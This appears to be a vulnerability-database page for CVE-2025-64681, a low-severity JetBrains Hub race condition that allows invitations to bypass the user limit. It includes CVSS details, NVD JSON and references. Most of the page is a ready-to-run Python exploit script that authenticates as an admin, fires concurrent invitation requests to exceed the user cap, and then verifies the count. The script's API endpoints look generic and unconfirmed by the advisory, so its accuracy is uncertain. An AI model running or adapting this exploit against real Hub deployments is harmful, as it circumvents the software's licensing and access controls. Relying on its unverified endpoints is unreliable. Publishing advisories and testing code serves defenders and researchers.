CVE-2025-64681

Description

In JetBrains Hub before 2025.3.104992 a race condition allowed bypass of the user limit via invitations

CVSS Details

CVSS Score

2.7

Severity

LOW

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:jetbrains:hub:*:*:*:*:*:*:*:* - VULNERABLE

JetBrains Hub < 2025.3.104992

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# CVE-2025-64681 PoC - Race Condition in JetBrains Hub User Limit Bypass
# This PoC demonstrates the race condition vulnerability in JetBrains Hub
# Requires high-privilege account credentials

import requests
import threading
import time
import sys

# Configuration
HUB_URL = "https://your-jetbrains-hub-instance.com"
USERNAME = "admin_username"
PASSWORD = "admin_password"
TARGET_USER_LIMIT = 10
CONCURRENT_REQUESTS = 20

class JetBrainsHubExploit:
    def __init__(self):
        self.session = requests.Session()
        self.token = None
        self.csrf_token = None
    
    def authenticate(self):
        """Authenticate with JetBrains Hub and obtain session token"""
        auth_url = f"{HUB_URL}/api/rest/users/login"
        payload = {
            "username": USERNAME,
            "password": PASSWORD
        }
        try:
            response = self.session.post(auth_url, json=payload, timeout=30)
            if response.status_code == 200:
                self.token = response.json().get('token')
                self.csrf_token = response.cookies.get('CSRF-TOKEN')
                print(f"[+] Authentication successful")
                return True
            else:
                print(f"[-] Authentication failed: {response.status_code}")
                return False
        except Exception as e:
            print(f"[-] Authentication error: {e}")
            return False
    
    def send_invitation(self, target_email, thread_id):
        """Send a single invitation request - exploiting race condition"""
        invite_url = f"{HUB_URL}/api/rest/invitations"
        headers = {
            "Authorization": f"Bearer {self.token}",
            "X-CSRF-TOKEN": self.csrf_token,
            "Content-Type": "application/json"
        }
        payload = {
            "email": target_email,
            "role": "user",
            "sendNotification": False
        }
        try:
            response = self.session.post(invite_url, json=payload, headers=headers, timeout=10)
            print(f"[Thread-{thread_id}] Invitation sent to {target_email}: Status {response.status_code}")
            return response.status_code == 200 or response.status_code == 201
        except Exception as e:
            print(f"[Thread-{thread_id}] Error: {e}")
            return False
    
    def exploit_race_condition(self):
        """Exploit the race condition to bypass user limit"""
        print(f"[*] Starting race condition exploit with {CONCURRENT_REQUESTS} threads")
        print(f"[*] Target user limit: {TARGET_USER_LIMIT}")
        
        threads = []
        for i in range(CONCURRENT_REQUESTS):
            target_email = f"attacker_user_{i}@example.com"
            thread = threading.Thread(target=self.send_invitation, args=(target_email, i))
            threads.append(thread)
        
        # Start all threads simultaneously to trigger race condition
        for thread in threads:
            thread.start()
        
        # Wait for all threads to complete
        for thread in threads:
            thread.join()
        
        print(f"[*] Exploit execution completed")
        print(f"[*] Check JetBrains Hub admin panel for created users")
    
    def verify_exploitation(self):
        """Verify if user limit was bypassed"""
        users_url = f"{HUB_URL}/api/rest/users/count"
        headers = {"Authorization": f"Bearer {self.token}"}
        try:
            response = self.session.get(users_url, headers=headers)
            if response.status_code == 200:
                user_count = response.json().get('count', 0)
                print(f"[*] Current user count: {user_count}")
                if user_count > TARGET_USER_LIMIT:
                    print(f"[!] VULNERABLE: User limit bypassed! Count exceeds {TARGET_USER_LIMIT}")
                    return True
                else:
                    print(f"[-] User count within limit or patch applied")
                    return False
        except Exception as e:
            print(f"[-] Verification error: {e}")
            return False

def main():
    if len(sys.argv) > 1 and sys.argv[1] == '--verify':
        print("[*] Verification mode - checking if target is vulnerable")
        exploit = JetBrainsHubExploit()
        if exploit.authenticate():
            exploit.verify_exploitation()
    else:
        print("[*] CVE-2025-64681 - JetBrains Hub Race Condition Exploit")
        print("[*] WARNING: This is for authorized security testing only")
        exploit = JetBrainsHubExploit()
        if exploit.authenticate():
            exploit.exploit_race_condition()
            time.sleep(2)
            exploit.verify_exploitation()

if __name__ == "__main__":
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-64681
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-64681
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-64681/
[4] VulDB https://vuldb.com/cve/CVE-2025-64681
[5] https://www.jetbrains.com/privacy-security/issues-fixed/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-64681", "sourceIdentifier": "[email protected]", "published": "2025-11-10T14:15:43.450", "lastModified": "2025-11-20T19:54:04.317", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In JetBrains Hub before 2025.3.104992 a race condition allowed bypass of the user limit via invitations"}, {"lang": "es", "value": "En JetBrains Hub antes de 2025.3.104992, una condición de carrera permitió eludir el límite de usuarios a través de invitaciones."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N", "baseScore": 2.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 3.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jetbrains:hub:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025.3.104992", "matchCriteriaId": "9F5AE1DF-DF89-45D2-BD7B-DF79E3D165BC"}]}]}], "references": [{"url": "https://www.jetbrains.com/privacy-security/issues-fixed/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}